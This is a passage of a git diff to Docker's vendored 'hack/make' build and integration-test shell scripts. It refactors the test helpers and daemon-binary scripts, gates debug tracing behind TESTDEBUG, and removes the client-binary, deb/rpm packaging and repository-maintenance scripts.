reset EXIT trap applied in .integration-daemon-start - for pidFile in $(find "$DEST" -name docker.pid); do - pid=$(set -x; cat "$pidFile") - ( set -x; kill "$pid" ) + pid=$([ -n "$TESTDEBUG" ] && set -x; cat "$pidFile") + ( + [ -n "$TESTDEBUG" ] && set -x + kill "$pid" + ) if ! wait "$pid"; then echo >&2 "warning: PID $pid from $pidFile had a nonzero exit code" fi @@ -15,7 +16,7 @@ if [ ! 
"$(go env GOOS)" = 'windows' ]; then # Stop apparmor if it is enabled if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then ( - set -x + [ -n "$TESTDEBUG" ] && set -x /etc/init.d/apparmor stop ) fi diff --git a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers index 7b73b2f140..da2bb7cad2 100644 --- a/vendor/github.com/docker/docker/hack/make/.integration-test-helpers +++ b/vendor/github.com/docker/docker/hack/make/.integration-test-helpers @@ -1,64 +1,91 @@ -#!/bin/bash - -: ${TEST_REPEAT:=0} - -bundle_test_integration_cli() { - TESTFLAGS="$TESTFLAGS -check.v -check.timeout=${TIMEOUT} -test.timeout=360m" - go_test_dir integration-cli $DOCKER_INTEGRATION_TESTS_VERIFIED -} - -# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. -# You can use this to select certain tests to run, e.g. -# -# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit +#!/usr/bin/env bash # # For integration-cli test, we use [gocheck](https://labix.org/gocheck), if you want # to run certain tests on your local host, you should run with command: # -# TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration-cli +# TESTFLAGS='-check.f DockerSuite.TestBuild*' ./hack/make.sh binary test-integration # -go_test_dir() { - dir=$1 - precompiled=$2 - testbinary="$DEST/test.main" - testcover=() - testcoverprofile=() - ( - mkdir -p "$DEST/coverprofiles" - export DEST="$ABS_DEST" # in a subshell this is safe -- our integration-cli tests need DEST, and "cd" screws it up - if [ -z $precompiled ]; then - ensure_test_dir $1 $testbinary - fi - cd "$dir" - i=0 - while ((++i)); do - test_env "$testbinary" $TESTFLAGS - if [ $i -gt "$TEST_REPEAT" ]; then - break - fi - echo "Repeating test ($i)" - done - ) +if [ -z $MAKEDIR ]; then + export MAKEDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd 
)" +fi +source "$MAKEDIR/.go-autogen" + +# Set defaults +: ${TEST_REPEAT:=1} +: ${TESTFLAGS:=} +: ${TESTDEBUG:=} + +integration_api_dirs=${TEST_INTEGRATION_DIR:-"$( + find ./integration -type d | + grep -vE '(^./integration($|/internal)|/testdata)')"} + +run_test_integration() { + [[ "$TESTFLAGS" != *-check.f* ]] && run_test_integration_suites + run_test_integration_legacy_suites +} + +run_test_integration_suites() { + local flags="-test.v -test.timeout=${TIMEOUT} $TESTFLAGS" + for dir in $integration_api_dirs; do + if ! ( + cd $dir + echo "Running $PWD" + test_env ./test.main $flags + ); then exit 1; fi + done } -ensure_test_dir() { +run_test_integration_legacy_suites() { ( - # make sure a test dir will compile - dir="$1" - out="$2" - echo Building test dir: "$dir" - set -xe - cd "$dir" - go test -c -o "$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" + flags="-check.v -check.timeout=${TIMEOUT} -test.timeout=360m $TESTFLAGS" + cd integration-cli + echo "Running $PWD" + test_env ./test.main $flags ) } +build_test_suite_binaries() { + if [ ${DOCKER_INTEGRATION_TESTS_VERIFIED-} ]; then + echo "Skipping building test binaries; as DOCKER_INTEGRATION_TESTS_VERIFIED is set" + return + fi + build_test_suite_binary ./integration-cli "test.main" + for dir in $integration_api_dirs; do + build_test_suite_binary "$dir" "test.main" + done +} + +# Build a binary for a test suite package +build_test_suite_binary() { + local dir="$1" + local out="$2" + echo Building test suite binary "$dir/$out" + go test -c -o "$dir/$out" -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" "$dir" +} + +cleanup_test_suite_binaries() { + [ -n "$TESTDEBUG" ] && return + echo "Removing test suite binaries" + find integration* -name test.main | xargs -r rm +} + +repeat() { + for i in $(seq 1 $TEST_REPEAT); do + echo "Running integration-test (iteration $i)" + $@ + done +} + +# use "env -i" to tightly control the environment variables that bleed into the tests test_env() { ( - set -xe - # use "env -i" to tightly 
control the environment variables that bleed into the tests + set -e + [ -n "$TESTDEBUG" ] && set -x env -i \ - DEST="$DEST" \ + DEST="$ABS_DEST" \ + DOCKER_API_VERSION="$DOCKER_API_VERSION" \ + DOCKER_BUILDKIT="$DOCKER_BUILDKIT" \ + DOCKER_INTEGRATION_DAEMON_DEST="$DOCKER_INTEGRATION_DAEMON_DEST" \ DOCKER_TLS_VERIFY="$DOCKER_TEST_TLS_VERIFY" \ DOCKER_CERT_PATH="$DOCKER_TEST_CERT_PATH" \ DOCKER_ENGINE_GOARCH="$DOCKER_ENGINE_GOARCH" \ @@ -73,7 +100,23 @@ test_env() { HOME="$ABS_DEST/fake-HOME" \ PATH="$PATH" \ TEMP="$TEMP" \ - TEST_IMAGE_NAMESPACE="$TEST_IMAGE_NAMESPACE" \ + TEST_CLIENT_BINARY="$TEST_CLIENT_BINARY" \ "$@" ) } + + +error_on_leaked_containerd_shims() { + if [ "$(go env GOOS)" == 'windows' ]; then + return + fi + + leftovers=$(ps -ax -o pid,cmd | + awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration/ { print $1 }') + if [ -n "$leftovers" ]; then + ps aux + kill -9 $leftovers 2> /dev/null + echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!" + exit 1 + fi +} diff --git a/vendor/github.com/docker/docker/hack/make/README.md b/vendor/github.com/docker/docker/hack/make/README.md index 6574b0efe6..3d069fa165 100644 --- a/vendor/github.com/docker/docker/hack/make/README.md +++ b/vendor/github.com/docker/docker/hack/make/README.md @@ -4,10 +4,9 @@ Each script is named after the bundle it creates. 
They should not be called directly - instead, pass it as argument to make.sh, for example: ``` -./hack/make.sh test ./hack/make.sh binary ubuntu -# Or to run all bundles: +# Or to run all default bundles: ./hack/make.sh ``` diff --git a/vendor/github.com/docker/docker/hack/make/binary b/vendor/github.com/docker/docker/hack/make/binary index 88b22cd462..eab69bb065 100644 --- a/vendor/github.com/docker/docker/hack/make/binary +++ b/vendor/github.com/docker/docker/hack/make/binary @@ -1,13 +1,8 @@ -#!/bin/bash +#!/usr/bin/env bash set -e rm -rf "$DEST" # This script exists as backwards compatibility for CI -( - DEST="${DEST}-client" - ABS_DEST="${ABS_DEST}-client" - . hack/make/binary-client -) ( DEST="${DEST}-daemon" ABS_DEST="${ABS_DEST}-daemon" diff --git a/vendor/github.com/docker/docker/hack/make/binary-client b/vendor/github.com/docker/docker/hack/make/binary-client deleted file mode 100644 index 1731fea8b0..0000000000 --- a/vendor/github.com/docker/docker/hack/make/binary-client +++ /dev/null @@ -1,12 +0,0 @@ -#!/bin/bash -set -e - -[ -z "$KEEPDEST" ] && \ - rm -rf "$DEST" - -( - source "${MAKEDIR}/.binary-setup" - export BINARY_SHORT_NAME="$DOCKER_CLIENT_BINARY_NAME" - export GO_PACKAGE='github.com/docker/docker/cmd/docker' - source "${MAKEDIR}/.binary" -) diff --git a/vendor/github.com/docker/docker/hack/make/binary-daemon b/vendor/github.com/docker/docker/hack/make/binary-daemon index e255543c16..f68163636b 100644 --- a/vendor/github.com/docker/docker/hack/make/binary-daemon +++ b/vendor/github.com/docker/docker/hack/make/binary-daemon @@ -1,13 +1,27 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -[ -z "$KEEPDEST" ] && \ - rm -rf "$DEST" +copy_binaries() { + local dir="$1" + local hash="$2" + # Add nested executables to bundle dir so we have complete set of + # them available, but only if the native OS/ARCH is the same as the + # OS/ARCH of the build target + if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then + return + 
fi + if [ ! -x /usr/local/bin/docker-runc ]; then + return + fi + echo "Copying nested executables into $dir" + for file in containerd containerd-shim containerd-ctr runc init proxy; do + cp -f `which "docker-$file"` "$dir/" + if [ "$hash" == "hash" ]; then + hash_files "$dir/docker-$file" + fi + done +} -( - source "${MAKEDIR}/.binary-setup" - export BINARY_SHORT_NAME="$DOCKER_DAEMON_BINARY_NAME" - export GO_PACKAGE='github.com/docker/docker/cmd/dockerd' - source "${MAKEDIR}/.binary" - copy_binaries "$DEST" 'hash' -) +[ -z "$KEEPDEST" ] && rm -rf "$DEST" +source "${MAKEDIR}/.binary" +copy_binaries "$DEST" 'hash' diff --git a/vendor/github.com/docker/docker/hack/make/build-deb b/vendor/github.com/docker/docker/hack/make/build-deb deleted file mode 100644 index d3c28591a6..0000000000 --- a/vendor/github.com/docker/docker/hack/make/build-deb +++ /dev/null @@ -1,91 +0,0 @@ -#!/bin/bash -set -e - -# subshell so that we can export PATH and TZ without breaking other things -( - export TZ=UTC # make sure our "date" variables are UTC-based - bundle .integration-daemon-start - bundle .detect-daemon-osarch - - # TODO consider using frozen images for the dockercore/builder-deb tags - - tilde='~' # ouch Bash 4.2 vs 4.3, you keel me - debVersion="${VERSION//-/$tilde}" # using \~ or '~' here works in 4.3, but not 4.2; just ~ causes $HOME to be inserted, hence the $tilde - # if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better - if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - gitUnix="$(git log -1 --pretty='%at')" - gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')" - gitCommit="$(git log -1 --pretty='%h')" - gitVersion="git${gitDate}.0.${gitCommit}" - # gitVersion is now something like 'git20150128.112847.0.17e840a' - debVersion="$debVersion~$gitVersion" - - # $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false - # true - # $ dpkg --compare-versions 1.5.0~rc1 gt 
1.5.0~git20150128.112847.17e840a && echo true || echo false - # true - # $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false - # true - - # ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a - fi - - debSource="$(awk -F ': ' '$1 == "Source" { print $2; exit }' hack/make/.build-deb/control)" - debMaintainer="$(awk -F ': ' '$1 == "Maintainer" { print $2; exit }' hack/make/.build-deb/control)" - debDate="$(date --rfc-2822)" - - # if go-md2man is available, pre-generate the man pages - make manpages - - builderDir="contrib/builder/deb/${PACKAGE_ARCH}" - pkgs=( $(find "${builderDir}/"*/ -type d) ) - if [ ! -z "$DOCKER_BUILD_PKGS" ]; then - pkgs=() - for p in $DOCKER_BUILD_PKGS; do - pkgs+=( "$builderDir/$p" ) - done - fi - for dir in "${pkgs[@]}"; do - [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } - version="$(basename "$dir")" - suite="${version##*-}" - - image="dockercore/builder-deb:$version" - if ! docker inspect "$image" &> /dev/null; then - ( - # Add the APT_MIRROR args only if the consuming Dockerfile uses it - # Otherwise this will cause the build to fail - if [ "$(grep 'ARG APT_MIRROR=' $dir/Dockerfile)" ] && [ "$BUILD_APT_MIRROR" ]; then - DOCKER_BUILD_ARGS="$DOCKER_BUILD_ARGS $BUILD_APT_MIRROR" - fi - set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" - ) - fi - - mkdir -p "$DEST/$version" - cat > "$DEST/$version/Dockerfile.build" <<-EOF - FROM $image - WORKDIR /usr/src/docker - COPY . 
/usr/src/docker - ENV DOCKER_GITCOMMIT $GITCOMMIT - RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers \ - && ln -snf /usr/src/docker /go/src/github.com/docker/docker - EOF - - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - # Install runc, containerd, proxy and tini - RUN ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini - EOF - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - RUN cp -aL hack/make/.build-deb debian - RUN { echo '$debSource (${debVersion}-0~${version}) $suite; urgency=low'; echo; echo ' * Version: $VERSION'; echo; echo " -- $debMaintainer $debDate"; } > debian/changelog && cat >&2 debian/changelog - RUN dpkg-buildpackage -uc -us -I.git - EOF - tempImage="docker-temp/build-deb:$version" - ( set -x && docker build -t "$tempImage" -f "$DEST/$version/Dockerfile.build" . ) - docker run --rm "$tempImage" bash -c 'cd .. && tar -c *_*' | tar -xvC "$DEST/$version" - docker rmi "$tempImage" - done - - bundle .integration-daemon-stop -) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary old mode 100644 new mode 100755 index 2039be416f..bbd5a22bcc --- a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary +++ b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary @@ -1,11 +1,7 @@ -#!/bin/bash +#!/usr/bin/env bash +# required by `make build-integration-cli-on-swarm` set -e -rm -rf "$DEST" -DEST="$DEST/../test-integration-cli" +source hack/make/.integration-test-helpers -if [ -z $DOCKER_INTEGRATION_TESTS_VERIFIED ]; then - source ${MAKEDIR}/.integration-test-helpers - ensure_test_dir integration-cli "$DEST/test.main" - export DOCKER_INTEGRATION_TESTS_VERIFIED=1 -fi +build_test_suite_binaries diff --git a/vendor/github.com/docker/docker/hack/make/build-rpm b/vendor/github.com/docker/docker/hack/make/build-rpm 
deleted file mode 100644 index 7fec059392..0000000000 --- a/vendor/github.com/docker/docker/hack/make/build-rpm +++ /dev/null @@ -1,148 +0,0 @@ -#!/bin/bash -set -e - -# subshell so that we can export PATH and TZ without breaking other things -( - export TZ=UTC # make sure our "date" variables are UTC-based - - source "$(dirname "$BASH_SOURCE")/.integration-daemon-start" - source "$(dirname "$BASH_SOURCE")/.detect-daemon-osarch" - - # TODO consider using frozen images for the dockercore/builder-rpm tags - - rpmName=docker-engine - rpmVersion="$VERSION" - rpmRelease=1 - - # rpmRelease versioning is as follows - # Docker 1.7.0: version=1.7.0, release=1 - # Docker 1.7.0-rc1: version=1.7.0, release=0.1.rc1 - # Docker 1.7.0-cs1: version=1.7.0.cs1, release=1 - # Docker 1.7.0-cs1-rc1: version=1.7.0.cs1, release=0.1.rc1 - # Docker 1.7.0-dev nightly: version=1.7.0, release=0.0.YYYYMMDD.HHMMSS.gitHASH - - # if we have a "-rc*" suffix, set appropriate release - if [[ "$rpmVersion" =~ .*-rc[0-9]+$ ]] ; then - rcVersion=${rpmVersion#*-rc} - rpmVersion=${rpmVersion%-rc*} - rpmRelease="0.${rcVersion}.rc${rcVersion}" - fi - - DOCKER_GITCOMMIT=$(git rev-parse --short HEAD) - if [ -n "$(git status --porcelain --untracked-files=no)" ]; then - DOCKER_GITCOMMIT="$DOCKER_GITCOMMIT-unsupported" - fi - - # if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better - if [[ "$rpmVersion" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - gitUnix="$(git log -1 --pretty='%at')" - gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')" - gitCommit="$(git log -1 --pretty='%h')" - gitVersion="${gitDate}.git${gitCommit}" - # gitVersion is now something like '20150128.112847.17e840a' - rpmVersion="${rpmVersion%-dev}" - rpmRelease="0.0.$gitVersion" - fi - - # Replace any other dashes with periods - rpmVersion="${rpmVersion/-/.}" - - rpmPackager="$(awk -F ': ' '$1 == "Packager" { print $2; exit }' hack/make/.build-rpm/${rpmName}.spec)" - 
rpmDate="$(date +'%a %b %d %Y')" - - # if go-md2man is available, pre-generate the man pages - make manpages - - # Convert the CHANGELOG.md file into RPM changelog format - VERSION_REGEX="^\W\W (.*) \((.*)\)$" - ENTRY_REGEX="^[-+*] (.*)$" - while read -r line || [[ -n "$line" ]]; do - if [ -z "$line" ]; then continue; fi - if [[ "$line" =~ $VERSION_REGEX ]]; then - echo >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog - echo "* `date -d ${BASH_REMATCH[2]} '+%a %b %d %Y'` ${rpmPackager} - ${BASH_REMATCH[1]}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog - fi - if [[ "$line" =~ $ENTRY_REGEX ]]; then - echo "- ${BASH_REMATCH[1]//\`}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog - fi - done < CHANGELOG.md - - builderDir="contrib/builder/rpm/${PACKAGE_ARCH}" - pkgs=( $(find "${builderDir}/"*/ -type d) ) - if [ ! -z "$DOCKER_BUILD_PKGS" ]; then - pkgs=() - for p in $DOCKER_BUILD_PKGS; do - pkgs+=( "$builderDir/$p" ) - done - fi - for dir in "${pkgs[@]}"; do - [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } - version="$(basename "$dir")" - suite="${version##*-}" - - image="dockercore/builder-rpm:$version" - if ! docker inspect "$image" &> /dev/null; then - ( set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" ) - fi - - mkdir -p "$DEST/$version" - cat > "$DEST/$version/Dockerfile.build" <<-EOF - FROM $image - COPY . 
/usr/src/${rpmName} - WORKDIR /usr/src/${rpmName} - RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers - EOF - - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - # Install runc, containerd, proxy and tini - RUN TMP_GOPATH="/go" ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini - EOF - if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - echo 'ENV DOCKER_EXPERIMENTAL 1' >> "$DEST/$version/Dockerfile.build" - fi - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - RUN mkdir -p /root/rpmbuild/SOURCES \ - && echo '%_topdir /root/rpmbuild' > /root/.rpmmacros - WORKDIR /root/rpmbuild - RUN ln -sfv /usr/src/${rpmName}/hack/make/.build-rpm SPECS - WORKDIR /root/rpmbuild/SPECS - RUN tar --exclude .git -r -C /usr/src -f /root/rpmbuild/SOURCES/${rpmName}.tar ${rpmName} - RUN tar --exclude .git -r -C /go/src/github.com/docker -f /root/rpmbuild/SOURCES/${rpmName}.tar containerd - RUN tar --exclude .git -r -C /go/src/github.com/docker/libnetwork/cmd -f /root/rpmbuild/SOURCES/${rpmName}.tar proxy - RUN tar --exclude .git -r -C /go/src/github.com/opencontainers -f /root/rpmbuild/SOURCES/${rpmName}.tar runc - RUN tar --exclude .git -r -C /go/ -f /root/rpmbuild/SOURCES/${rpmName}.tar tini - RUN gzip /root/rpmbuild/SOURCES/${rpmName}.tar - RUN { cat /usr/src/${rpmName}/contrib/builder/rpm/${PACKAGE_ARCH}/changelog; } >> ${rpmName}.spec && tail >&2 ${rpmName}.spec - RUN rpmbuild -ba \ - --define '_gitcommit $DOCKER_GITCOMMIT' \ - --define '_release $rpmRelease' \ - --define '_version $rpmVersion' \ - --define '_origversion $VERSION' \ - --define '_experimental ${DOCKER_EXPERIMENTAL:-0}' \ - ${rpmName}.spec - EOF - # selinux policy referencing systemd things won't work on non-systemd versions - # of centos or rhel, which we don't support anyways - if [ "${suite%.*}" -gt 6 ] && [[ "$version" != opensuse* ]]; then - selinuxDir="selinux" - if [ -d "./contrib/selinux-$version" ]; then - 
selinuxDir="selinux-${version}" - fi - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - RUN tar -cz -C /usr/src/${rpmName}/contrib/${selinuxDir} -f /root/rpmbuild/SOURCES/${rpmName}-selinux.tar.gz ${rpmName}-selinux - RUN rpmbuild -ba \ - --define '_gitcommit $DOCKER_GITCOMMIT' \ - --define '_release $rpmRelease' \ - --define '_version $rpmVersion' \ - --define '_origversion $VERSION' \ - ${rpmName}-selinux.spec - EOF - fi - tempImage="docker-temp/build-rpm:$version" - ( set -x && docker build -t "$tempImage" -f $DEST/$version/Dockerfile.build . ) - docker run --rm "$tempImage" bash -c 'cd /root/rpmbuild && tar -c *RPMS' | tar -xvC "$DEST/$version" - docker rmi "$tempImage" - done - - source "$(dirname "$BASH_SOURCE")/.integration-daemon-stop" -) 2>&1 | tee -a $DEST/test.log diff --git a/vendor/github.com/docker/docker/hack/make/clean-apt-repo b/vendor/github.com/docker/docker/hack/make/clean-apt-repo deleted file mode 100755 index 1c37d98e40..0000000000 --- a/vendor/github.com/docker/docker/hack/make/clean-apt-repo +++ /dev/null @@ -1,43 +0,0 @@ -#!/bin/bash -set -e - -# This script cleans the experimental pool for the apt repo. -# This is useful when there are a lot of old experimental debs and you only want to keep the most recent. 
-# - -: ${DOCKER_RELEASE_DIR:=$DEST} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo/pool/experimental -: ${DOCKER_ARCHIVE_DIR:=$DEST/archive} -DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" - -latest_versions=$(dpkg-scanpackages "$APTDIR" /dev/null 2>/dev/null | awk -F ': ' '$1 == "Filename" { print $2 }') - -# get the latest version -latest_docker_engine_file=$(echo "$latest_versions" | grep docker-engine) -latest_docker_engine_version=$(basename ${latest_docker_engine_file%~*}) - -echo "latest docker-engine version: $latest_docker_engine_version" - -# remove all the files that are not that version in experimental -pool_dir=$(dirname "$latest_docker_engine_file") -old_pkgs=( $(ls "$pool_dir" | grep -v "^${latest_docker_engine_version}" | grep "${latest_docker_engine_version%%~git*}") ) - -echo "${old_pkgs[@]}" - -mkdir -p "$DOCKER_ARCHIVE_DIR" -for old_pkg in "${old_pkgs[@]}"; do - echo "moving ${pool_dir}/${old_pkg} to $DOCKER_ARCHIVE_DIR" - mv "${pool_dir}/${old_pkg}" "$DOCKER_ARCHIVE_DIR" -done - -echo -echo "$pool_dir now has contents:" -ls "$pool_dir" - -# now regenerate release files for experimental -export COMPONENT=experimental -source "${DIR}/update-apt-repo" - -echo "You will now want to: " -echo " - re-sign the repo with hack/make/sign-repo" -echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/clean-yum-repo b/vendor/github.com/docker/docker/hack/make/clean-yum-repo deleted file mode 100755 index 1cafbbd97f..0000000000 --- a/vendor/github.com/docker/docker/hack/make/clean-yum-repo +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -e - -# This script cleans the experimental pool for the yum repo. -# This is useful when there are a lot of old experimental rpms and you only want to keep the most recent. 
-# - -: ${DOCKER_RELEASE_DIR:=$DEST} -YUMDIR=$DOCKER_RELEASE_DIR/yum/repo/experimental - -suites=( $(find "$YUMDIR" -mindepth 1 -maxdepth 1 -type d) ) - -for suite in "${suites[@]}"; do - echo "cleanup in: $suite" - ( set -x; repomanage -k2 --old "$suite" | xargs rm -f ) -done - -echo "You will now want to: " -echo " - re-sign the repo with hack/make/sign-repo" -echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/cover b/vendor/github.com/docker/docker/hack/make/cover deleted file mode 100644 index 08e28e3fea..0000000000 --- a/vendor/github.com/docker/docker/hack/make/cover +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/bash -set -e - -bundle_cover() { - coverprofiles=( "$DEST/../"*"/coverprofiles/"* ) - for p in "${coverprofiles[@]}"; do - echo - ( - set -x - go tool cover -func="$p" - ) - done -} - -bundle_cover 2>&1 | tee "$DEST/report.log" diff --git a/vendor/github.com/docker/docker/hack/make/cross b/vendor/github.com/docker/docker/hack/make/cross index 6d672b17c3..85dd3c637f 100644 --- a/vendor/github.com/docker/docker/hack/make/cross +++ b/vendor/github.com/docker/docker/hack/make/cross @@ -1,46 +1,29 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -# explicit list of os/arch combos that support being a daemon -declare -A daemonSupporting -daemonSupporting=( - [linux/amd64]=1 - [windows/amd64]=1 -) - # if we have our linux/amd64 version compiled, let's symlink it in if [ -x "$DEST/../binary-daemon/dockerd-$VERSION" ]; then arch=$(go env GOHOSTARCH) mkdir -p "$DEST/linux/${arch}" ( cd "$DEST/linux/${arch}" - ln -s ../../../binary-daemon/* ./ - ln -s ../../../binary-client/* ./ + ln -sf ../../../binary-daemon/* ./ ) echo "Created symlinks:" "$DEST/linux/${arch}/"* fi +DOCKER_CROSSPLATFORMS=${DOCKER_CROSSPLATFORMS:-"linux/amd64 windows/amd64"} + for platform in $DOCKER_CROSSPLATFORMS; do ( export KEEPDEST=1 export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION - mkdir -p 
"$DEST" - ABS_DEST="$(cd "$DEST" && pwd -P)" export GOOS=${platform%/*} export GOARCH=${platform##*/} - if [ "$GOOS" != "solaris" ]; then - # TODO. Solaris cannot be cross build because of CGO calls. - if [ -z "${daemonSupporting[$platform]}" ]; then - # we just need a simple client for these platforms - export LDFLAGS_STATIC_DOCKER="" - # remove the "daemon" build tag from platforms that aren't supported - export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) - source "${MAKEDIR}/binary-client" - else - source "${MAKEDIR}/binary-client" - source "${MAKEDIR}/binary-daemon" - fi - fi + echo "Cross building: $DEST" + mkdir -p "$DEST" + ABS_DEST="$(cd "$DEST" && pwd -P)" + source "${MAKEDIR}/binary-daemon" ) done diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary b/vendor/github.com/docker/docker/hack/make/dynbinary index 1a435dc4bf..981e505e9f 100644 --- a/vendor/github.com/docker/docker/hack/make/dynbinary +++ b/vendor/github.com/docker/docker/hack/make/dynbinary @@ -1,12 +1,7 @@ -#!/bin/bash +#!/usr/bin/env bash set -e # This script exists as backwards compatibility for CI -( - DEST="${DEST}-client" - ABS_DEST="${ABS_DEST}-client" - . 
hack/make/dynbinary-client -) ( DEST="${DEST}-daemon" diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-client b/vendor/github.com/docker/docker/hack/make/dynbinary-client deleted file mode 100644 index e4b7741848..0000000000 --- a/vendor/github.com/docker/docker/hack/make/dynbinary-client +++ /dev/null @@ -1,12 +0,0 @@ -#!/bin/bash -set -e - -( - export BINARY_SHORT_NAME='docker' - export GO_PACKAGE='github.com/docker/docker/cmd/docker' - export IAMSTATIC='false' - export LDFLAGS_STATIC_DOCKER='' - export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary - export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here - source "${MAKEDIR}/.binary" -) diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon index 090a916f65..d1c0070e62 100644 --- a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon +++ b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon @@ -1,9 +1,7 @@ -#!/bin/bash +#!/usr/bin/env bash set -e ( - export BINARY_SHORT_NAME='dockerd' - export GO_PACKAGE='github.com/docker/docker/cmd/dockerd' export IAMSTATIC='false' export LDFLAGS_STATIC_DOCKER='' export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary diff --git a/vendor/github.com/docker/docker/hack/make/generate-index-listing b/vendor/github.com/docker/docker/hack/make/generate-index-listing deleted file mode 100755 index ec44171f81..0000000000 --- a/vendor/github.com/docker/docker/hack/make/generate-index-listing +++ /dev/null @@ -1,74 +0,0 @@ -#!/bin/bash -set -e - -# This script generates index files for the directory structure -# of the apt and yum repos - -: ${DOCKER_RELEASE_DIR:=$DEST} -APTDIR=$DOCKER_RELEASE_DIR/apt -YUMDIR=$DOCKER_RELEASE_DIR/yum - -if [ ! -d $APTDIR ] && [ ! 
-d $YUMDIR ]; then - echo >&2 'release-rpm or release-deb must be run before generate-index-listing' - exit 1 -fi - -create_index() { - local directory=$1 - local original=$2 - local cleaned=${directory#$original} - - # the index file to create - local index_file="${directory}/index" - - # cd into dir & touch the index file - cd $directory - touch $index_file - - # print the html header - cat <<-EOF > "$index_file" - - - Index of ${cleaned}/ - -

Index of ${cleaned}/


-

" >> $index_file - -} - -get_dirs() { - local directory=$1 - - for d in `find ${directory} -type d`; do - create_index $d $directory - done -} - -get_dirs $APTDIR -get_dirs $YUMDIR diff --git a/vendor/github.com/docker/docker/hack/make/install-binary b/vendor/github.com/docker/docker/hack/make/install-binary index 82cbc79933..f6a4361fdb 100644 --- a/vendor/github.com/docker/docker/hack/make/install-binary +++ b/vendor/github.com/docker/docker/hack/make/install-binary @@ -1,12 +1,29 @@ -#!/bin/bash +#!/usr/bin/env bash set -e rm -rf "$DEST" -( - source "${MAKEDIR}/install-binary-client" -) +install_binary() { + local file="$1" + local target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/" + if [ "$(go env GOOS)" == "linux" ]; then + echo "Installing $(basename $file) to ${target}" + mkdir -p "$target" + cp -f -L "$file" "$target" + else + echo "Install is only supported on linux" + return 1 + fi +} ( - source "${MAKEDIR}/install-binary-daemon" + DEST="$(dirname $DEST)/binary-daemon" + source "${MAKEDIR}/.binary-setup" + install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}" ) diff --git 